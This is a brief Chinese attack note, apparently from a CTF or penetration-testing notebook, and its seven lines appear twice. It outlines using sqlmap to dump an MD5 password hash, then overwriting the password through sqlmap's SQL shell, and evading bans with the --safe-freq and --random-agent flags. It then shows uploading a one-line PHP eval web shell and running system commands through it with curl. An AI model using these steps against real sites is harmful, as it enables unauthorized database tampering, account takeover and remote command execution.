利用sqlmap注入出md5
发现在cmd5上无法查出结果,我们只能尝试修改密码
sqlmap --sql-shell 当pdo和mysqli时
输入update 表 set 字段=md5
注入被ban,利用参数–safe-freq和–random-agent
上传一句话木马<?php eval($_POST[e]);?>
curl 域名 -X post --data "e=system('ls')"
利用sqlmap注入出md5
发现在cmd5上无法查出结果,我们只能尝试修改密码
sqlmap --sql-shell 当pdo和mysqli时
输入update 表 set 字段=md5
注入被ban,利用参数–safe-freq和–random-agent
上传一句话木马<?php eval($_POST[e]);?>
curl 域名 -X post --data "e=system('ls')"